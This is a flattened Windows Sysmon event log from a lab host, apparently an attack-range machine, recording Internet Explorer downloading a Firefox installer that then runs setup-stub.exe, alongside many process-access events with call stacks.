Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\system32\explorerframe.dll+1501|C:\Windows\SYSTEM32\IEFRAME.dll+6dbf2|C:\Windows\SYSTEM32\IEFRAME.dll+6885|C:\Windows\SYSTEM32\IEFRAME.dll+62cf|C:\Windows\SYSTEM32\IEFRAME.dll+1a1666|C:\Windows\SYSTEM32\IEFRAME.dll+65e1|C:\Windows\SYSTEM32\IEFRAME.dll+5ea7|C:\Windows\SYSTEM32\IEFRAME.dll+831a|C:\Windows\SYSTEM32\IEFRAME.dll+160b0d|C:\Windows\SYSTEM32\IEFRAME.dll+e5191|C:\Windows\SYSTEM32\IEFRAME.dll+57e1f|C:\Windows\SYSTEM32\IEFRAME.dll+57d00|C:\Windows\SYSTEM32\IEFRAME.dll+52c0c|C:\Windows\SYSTEM32\IEFRAME.dll+5097c|C:\Windows\SYSTEM32\IEFRAME.dll+314c5a|C:\Windows\SYSTEM32\IEFRAME.dll+d2e36 10341000x800000000000000013831Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:41.646{59A5CD1D-940F-6005-0C05-00000000A301}64766480C:\Program Files\Internet Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\system32\explorerframe.dll+1501|C:\Windows\SYSTEM32\IEFRAME.dll+6dbf2|C:\Windows\SYSTEM32\IEFRAME.dll+6885|C:\Windows\SYSTEM32\IEFRAME.dll+62cf|C:\Windows\SYSTEM32\IEFRAME.dll+1a1666|C:\Windows\SYSTEM32\IEFRAME.dll+65e1|C:\Windows\SYSTEM32\IEFRAME.dll+5ea7|C:\Windows\SYSTEM32\IEFRAME.dll+831a|C:\Windows\SYSTEM32\IEFRAME.dll+160b0d|C:\Windows\SYSTEM32\IEFRAME.dll+e5191|C:\Windows\SYSTEM32\IEFRAME.dll+57e1f|C:\Windows\SYSTEM32\IEFRAME.dll+57d00|C:\Windows\SYSTEM32\IEFRAME.dll+52c0c|C:\Windows\SYSTEM32\IEFRAME.dll+5097c|C:\Windows\SYSTEM32\IEFRAME.dll+314c5a|C:\Windows\SYSTEM32\IEFRAME.dll+d2e36|C:\Windows\SYSTEM32\IEFRAME.dll+d1f16 10341000x800000000000000013830Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:41.646{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b0dc0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013829Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:41.646{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000013828Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDownloads2021-01-18 13:59:41.646{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXEC:\Users\Administrator\Downloads\Firefox Installer.exe.t6yq1ad.partial2021-01-18 13:59:41.646 11241100x800000000000000013827Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDownloads2021-01-18 13:59:41.646{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Administrator\Downloads\Firefox Installer.exe.t6yq1ad.partial2021-01-18 13:59:41.646 10341000x800000000000000013826Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:41.568{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b0dc0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013825Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:41.568{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013881Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.990{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013880Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.990{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b0dc0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013879Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.990{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013878Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.990{59A5CD1D-8E46-6005-1600-00000000A301}15444140C:\Windows\system32\svchost.exe{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013877Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.990{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013876Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.958{59A5CD1D-93F6-6005-E604-00000000A301}48881684C:\Windows\system32\csrss.exe{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013875Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.958{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013874Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.958{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013873Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.958{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013872Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.958{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013871Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.943{59A5CD1D-944E-6005-2105-00000000A301}57726004C:\Users\Administrator\Downloads\Firefox Installer.exe{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+159f0b(wow64)|C:\Windows\System32\KERNELBASE.dll+159bbc(wow64)|C:\Users\Administrator\Downloads\Firefox Installer.exe+18fd0|C:\Users\Administrator\Downloads\Firefox Installer.exe+1a0da|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 154100x800000000000000013870Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.953{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe84.0.2Firefox InstallerFirefoxMozilla Corporationsetup-stub.exe.\setup-stub.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492HighMD5=13616B0D9805FA0528FCCE4ABF30BA03,SHA256=DA0DF48FE9468F1335CD30E513E18357273CC7DDEBF8284444E595517E98D7B6,IMPHASH=E2A592076B17EF8BFB48B7E03965A3FC{59A5CD1D-944E-6005-2105-00000000A301}5772C:\Users\Administrator\Downloads\Firefox Installer.exe"C:\Users\Administrator\Downloads\Firefox Installer.exe" 10341000x800000000000000013869Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.943{59A5CD1D-8E46-6005-1200-00000000A301}12124900C:\Windows\System32\svchost.exe{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac06|c:\windows\system32\pcasvc.dll+aa66|c:\windows\system32\pcasvc.dll+aa28|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013868Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.943{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b0dc0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013867Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.943{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000013866Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localEXE2021-01-18 13:59:42.927{59A5CD1D-944E-6005-2105-00000000A301}5772C:\Users\Administrator\Downloads\Firefox Installer.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe2021-01-18 13:59:42.927 10341000x800000000000000013865Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.927{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-944E-6005-2105-00000000A301}5772C:\Users\Administrator\Downloads\Firefox Installer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b090f|C:\Windows\System32\SHELL32.dll+b14b5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013864Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.927{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-944E-6005-2105-00000000A301}5772C:\Users\Administrator\Downloads\Firefox Installer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b13ce|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013863Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.927{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-944E-6005-2105-00000000A301}5772C:\Users\Administrator\Downloads\Firefox Installer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013862Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.927{59A5CD1D-93FA-6005-FC04-00000000A301}37846072C:\Windows\Explorer.EXE{59A5CD1D-944E-6005-2105-00000000A301}5772C:\Users\Administrator\Downloads\Firefox Installer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b090f|C:\Windows\System32\SHELL32.dll+b14b5|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013861Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.927{59A5CD1D-93FA-6005-FC04-00000000A301}37846072C:\Windows\Explorer.EXE{59A5CD1D-944E-6005-2105-00000000A301}5772C:\Users\Administrator\Downloads\Firefox Installer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b13ce|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013860Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.927{59A5CD1D-93FA-6005-FC04-00000000A301}37846072C:\Windows\Explorer.EXE{59A5CD1D-944E-6005-2105-00000000A301}5772C:\Users\Administrator\Downloads\Firefox Installer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013859Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.927{59A5CD1D-93FA-6005-FC04-00000000A301}37846072C:\Windows\Explorer.EXE{59A5CD1D-944E-6005-2105-00000000A301}5772C:\Users\Administrator\Downloads\Firefox Installer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013858Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.927{59A5CD1D-93F9-6005-F504-00000000A301}1756872C:\Windows\system32\taskhostw.exe{59A5CD1D-944E-6005-2105-00000000A301}5772C:\Users\Administrator\Downloads\Firefox Installer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013857Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.912{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-944E-6005-2105-00000000A301}5772C:\Users\Administrator\Downloads\Firefox Installer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b090f|C:\Windows\System32\SHELL32.dll+b0e30|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013856Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.912{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-944E-6005-2105-00000000A301}5772C:\Users\Administrator\Downloads\Firefox Installer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+97140|C:\Windows\System32\SHELL32.dll+b0dec|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 